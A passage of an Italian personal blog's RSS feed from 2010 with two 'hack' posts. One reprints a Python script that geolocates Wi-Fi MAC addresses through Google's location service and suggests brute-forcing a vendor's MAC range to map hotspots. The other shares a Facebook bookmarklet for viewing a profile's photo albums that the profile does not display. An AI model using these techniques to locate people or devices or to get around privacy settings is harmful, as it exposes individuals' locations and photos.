<p><a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/stumbleupon?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="StumbleUpon" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/stumbleupon.png" width="16" height="16" alt="StumbleUpon"/></a> <a href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="Google Reader" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/reader.png" width="16" height="16" alt="Google Reader"/></a> <a href="http://www.addtoany.com/add_to/orkut?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="Orkut" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/orkut.png" width="16" height="16" alt="Orkut"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/myspace?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="MySpace" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/myspace.png" width="16" height="16" alt="MySpace"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a href="http://www.addtoany.com/add_to/technorati_favorites?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="Technorati Favorites" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/technorati.png" width="16" height="16" alt="Technorati Favorites"/></a> <a href="http://www.addtoany.com/add_to/yahoo_bookmarks?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="Yahoo Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/yahoo.png" width="16" height="16" alt="Yahoo Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/linkedin?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="LinkedIn" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/linkedin.png" width="16" height="16" alt="LinkedIn"/></a> <a href="http://www.addtoany.com/add_to/blogger_post?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="Blogger Post" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/blogger.png" width="16" height="16" alt="Blogger Post"/></a> <a href="http://www.addtoany.com/add_to/netlog?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="Netlog" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/netlog.png" width="16" height="16" alt="Netlog"/></a> <a href="http://www.addtoany.com/add_to/tumblr?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="Tumblr" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/tumblr.png" width="16" height="16" alt="Tumblr"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.nicolamoretti.com/2010/05/impostazioni-privacy-facebook/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Google Wifi DB</title>
		<link>http://blog.nicolamoretti.com/2010/01/google-wifi-db/</link>
		<comments>http://blog.nicolamoretti.com/2010/01/google-wifi-db/#comments</comments>
		<pubDate>Sun, 31 Jan 2010 15:31:38 +0000</pubDate>
		<dc:creator>Nick</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[db]]></category>
		<category><![CDATA[eng]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[script]]></category>
		<category><![CDATA[wifi]]></category>

		<guid isPermaLink="false">http://blog.nicolamoretti.com/?p=137</guid>
		<description><![CDATA[<br/>Try compiling this form with a wifi MAC Address and press Enter (iframe): The source code is: #!/usr/bin/python # Copyright (C) 2010 Kees Cook # License: GPLv3 # Find location of a MAC address via Google Location Services # http://code.google.com/p/gears/wiki/GeolocationAPI import cgi import sys, urllib2 import simplejson import pprint form = cgi.FieldStorage() if not form: [...]]]></description>
			<content:encoded><![CDATA[<br/><p>Try compiling this form with a wifi MAC Address and press Enter (iframe):</p>
<p><iframe src="http://outflux.net/geoloc/" width="500"></iframe></p>
<p>The source code is:</p>
<pre name="code" class="py">
#!/usr/bin/python
# Copyright (C) 2010 Kees Cook <kees@outflux.net>
# License: GPLv3
# Find location of a MAC address via Google Location Services
# http://code.google.com/p/gears/wiki/GeolocationAPI
import cgi
import sys, urllib2
import simplejson
import pprint

form = cgi.FieldStorage()
if not form:
    print "Content-type: text/html"
    print ""
    print "<html><head></head><body>"
    print "Enter MAC address to locate:
<form>
<input type=text name=mac length=20></form>

"
    print '<a href="index.txt">source</a>'
    print "</body></html>"
    sys.exit(0)

#try:
if True:
    loc_req = { 'version': '1.1.0',
                'request_address': True,
                'address_language': 'en',
                'wifi_towers': [] }
    bssid = form['mac'].value
    loc_req['wifi_towers'] += [{ 'mac_address': bssid.replace(':','-'),
                                 'signal_strength': 1 } ]

    data = simplejson.JSONEncoder().encode(loc_req)

    output = urllib2.urlopen('https://www.google.com/loc/json', data).read()
    output = simplejson.loads(output)

    print "Content-type: text/plain"
    print ""
    pprint.pprint(output)
    if output['location']['accuracy'] >= 22000:
        print "# N.B. Accuracy of 22000 or higher seems to indicate unknown location..."
else:
    print "Content-type: text/html"
    print ""
    print "<html><head></head><body>"
    print "Sorry, something went wrong"
    print "</body></html>"
</pre>
<p>Think at the possibility for somebody to bruteforce Google DB and retrieve these infos.</p>
<p>Starting from <a href="http://standards.ieee.org/regauth/oui/oui.txt" >http://standards.ieee.org/regauth/oui/oui.txt</a>, for example, i can try 16^6 mac addresses starting from 00-18-84 to get info about FON hotspots and achieve locations in a day or less.</p>
<p>I think this is not illegal as this is what my GPhone actually does. PS: I have not checked against any bruteforce prevention.</p>
<p>Thanks to Kees Cook.</p>
<p><a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/stumbleupon?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="StumbleUpon" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/stumbleupon.png" width="16" height="16" alt="StumbleUpon"/></a> <a href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="Google Reader" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/reader.png" width="16" height="16" alt="Google Reader"/></a> <a href="http://www.addtoany.com/add_to/orkut?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="Orkut" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/orkut.png" width="16" height="16" alt="Orkut"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/myspace?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="MySpace" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/myspace.png" width="16" height="16" alt="MySpace"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a href="http://www.addtoany.com/add_to/technorati_favorites?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="Technorati Favorites" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/technorati.png" width="16" height="16" alt="Technorati Favorites"/></a> <a href="http://www.addtoany.com/add_to/yahoo_bookmarks?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="Yahoo Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/yahoo.png" width="16" height="16" alt="Yahoo Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/linkedin?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="LinkedIn" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/linkedin.png" width="16" height="16" alt="LinkedIn"/></a> <a href="http://www.addtoany.com/add_to/blogger_post?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="Blogger Post" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/blogger.png" width="16" height="16" alt="Blogger Post"/></a> <a href="http://www.addtoany.com/add_to/netlog?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="Netlog" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/netlog.png" width="16" height="16" alt="Netlog"/></a> <a href="http://www.addtoany.com/add_to/tumblr?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="Tumblr" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/tumblr.png" width="16" height="16" alt="Tumblr"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.nicolamoretti.com/2010/01/google-wifi-db/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Hack foto pubbliche nei profili Facebook</title>
		<link>http://blog.nicolamoretti.com/2010/01/hack-foto-facebook/</link>
		<comments>http://blog.nicolamoretti.com/2010/01/hack-foto-facebook/#comments</comments>
		<pubDate>Sat, 23 Jan 2010 21:01:00 +0000</pubDate>
		<dc:creator>Nick</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[facebook]]></category>
		<category><![CDATA[foto]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[profilo]]></category>
		<category><![CDATA[trucco]]></category>

		<guid isPermaLink="false">http://blog.nicolamoretti.com/?p=56</guid>
		<description><![CDATA[<br/>Ricopio questo interessantissimo codice che, inserito nel browser al posto della barra di indirizzo o salvato come segnalibro, ci permette di vedere le foto pubbliche dei profili di facebook. javascript:(function(){function%20y(){if(x.readyState==4){q=x.responseText.substring(9);p=eval('('+q+')');document.getElementById('tab_canvas').innerHTML=p.payload.tab_content;}}x=window.XMLHttpRequest?new%20window.XMLHttpRequest:(window.ActiveXObject?new%20ActiveXObject("MSXML2.XMLHTTP"):null);x.onreadystatechange=y;x.open('POST','http://www.facebook.com/ajax/profile/tab.php',true);x.send('id='+ProfileURIController._profileId+'&#38;v=photos&#38;__a=1');})() Come fare? Semplice: salviamo questo link &#8211;]]></description>
			<content:encoded><![CDATA[<br/><p>Ricopio questo interessantissimo codice che, inserito nel browser al posto della barra di indirizzo o salvato come segnalibro, ci permette di vedere le foto pubbliche dei profili di facebook.</p>
<p><code><small>javascript:(function(){function%20y(){if(x.readyState==4){q=x.responseText.substring(9);p=eval('('+q+')');document.getElementById('tab_canvas').innerHTML=p.payload.tab_content;}}x=window.XMLHttpRequest?new%20window.XMLHttpRequest:(window.ActiveXObject?new%20ActiveXObject("MSXML2.XMLHTTP"):null);x.onreadystatechange=y;x.open('POST','http://www.facebook.com/ajax/profile/tab.php',true);x.send('id='+ProfileURIController._profileId+'&amp;v=photos&amp;__a=1');})()</small></code></p>
<p>Come fare? Semplice:</p>
<p><a href="http://blog.nicolamoretti.com/wp-content/uploads/2009/12/privalbums.png" ><img class="size-medium wp-image-57 alignright" title="Hack album pubblici" src="http://blog.nicolamoretti.com/wp-content/uploads/2009/12/privalbums-300x180.png" alt="Hack album pubblici" width="300" height="180" /></a></p>
<ol>
<li>salviamo questo link &#8211; <a rel="nofollow" href="javascript:(function(){function%20y(){if(x.readyState==4){q=x.responseText.substring(9);p=eval('('+q+')');document.getElementById('tab_canvas').innerHTML=p.payload.tab_content;}}x=window.XMLHttpRequest?new%20window.XMLHttpRequest:(window.ActiveXObject?new%20ActiveXObject('MSXML2.XMLHTTP'):null);x.onreadystatechange=y;x.open('POST','http://www.facebook.com/ajax/profile/tab.php" ,true);x.send('id='+ProfileURIController._profileId+'&amp;v=photos&amp;__a=1');})()">Cerca Foto Facebook</a> &#8211; nei nostri segnalibri;</li>
<li>visitiamo il profilo pubblico di una persona (ci troveremo alla pagina info);</li>
<li>clicchiamo sul link e al posto del profilo ci appariranno album e foto pubblic  he.</li>
</ol>
<p>Tratto da: <a href="http://theharmonyguy.com/2009/12/17/easily-view-hidden-facebook-photo-albums/" >theharmonyguy.com</a></p>
<p><a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fhack-foto-facebook%2F&amp;linkname=Hack%20foto%20pubbliche%20nei%20profili%20Facebook" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fhack-foto-facebook%2F&amp;linkname=Hack%20foto%20pubbliche%20nei%20profili%20Facebook" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fhack-foto-facebook%2F&amp;linkname=Hack%20foto%20pubbliche%20nei%20profili%20Facebook" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/stumbleupon?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fhack-foto-facebook%2F&amp;linkname=Hack%20foto%20pubbliche%20nei%20profili%20Facebook" title="StumbleUpon" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/stumbleupon.png" width="16" height="16" alt="StumbleUpon"/></a> <a href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fhack-foto-facebook%2F&amp;linkname=Hack%20foto%20pubbliche%20nei%20profili%20Facebook" title="Google Reader" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/reader.png" width="16" height="16" alt="Google Reader"/></a> <a href="http://www.addtoany.com/add_to/orkut?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fhack-foto-facebook%2F&amp;linkname=Hack%20foto%20pubbliche%20nei%20profili%20Facebook" title="Orkut" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/orkut.png" width="16" height="16" alt="Orkut"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fhack-foto-facebook%2F&amp;linkname=Hack%20foto%20pubbliche%20nei%20profili%20Facebook" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/myspace?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fhack-foto-facebook%2F&amp;linkname=Hack%20foto%20pubbliche%20nei%20profili%20Facebook" title="MySpace" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/myspace.png" width="16" height="16" alt="MySpace"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fhack-foto-facebook%2F&amp;linkname=Hack%20foto%20pubbliche%20nei%20profili%20Facebook" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a href="http://www.addtoany.com/add_to/technorati_favorites?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fhack-foto-facebook%2F&amp;linkname=Hack%20foto%20pubbliche%20nei%20profili%20Facebook" title="Technorati Favorites" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/technorati.png" width="16" height="16" alt="Technorati Favorites"/></a> <a href="http://www.addtoany.com/add_to/yahoo_bookmarks?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fhack-foto-facebook%2F&amp;linkname=Hack%20foto%20pubbliche%20nei%20profili%20Facebook" title="Yahoo Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/yahoo.png" width="16" height="16" alt="Yahoo Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/linkedin?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fhack-foto-facebook%2F&amp;linkname=Hack%20foto%20pubbliche%20nei%20profili%20Facebook" title="LinkedIn" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/linkedin.png" width="16" height="16" alt="LinkedIn"/></a> <a href="http://www.addtoany.com/add_to/blogger_post?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fhack-foto-facebook%2F&amp;linkname=Hack%20foto%20pubbliche%20nei%20profili%20Facebook" title="Blogger Post" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/blogger.png" width="16" height="16" alt="Blogger Post"/></a> <a href="http://www.addtoany.com/add_to/netlog?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fhack-foto-facebook%2F&amp;linkname=Hack%20foto%20pubbliche%20nei%20profili%20Facebook" title="Netlog" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/netlog.png" width="16" height="16" alt="Netlog"/></a> <a href="http://www.addtoany.com/add_to/tumblr?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fhack-foto-facebook%2F&amp;linkname=Hack%20foto%20pubbliche%20nei%20profili%20Facebook" title="Tumblr" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/tumblr.png" width="16" height="16" alt="Tumblr"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fhack-foto-facebook%2F&amp;linkname=Hack%20foto%20pubbliche%20nei%20profili%20Facebook" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fhack-foto-facebook%2F&amp;linkname=Hack%20foto%20pubbliche%20nei%20profili%20Facebook" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.nicolamoretti.com/2010/01/hack-foto-facebook/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
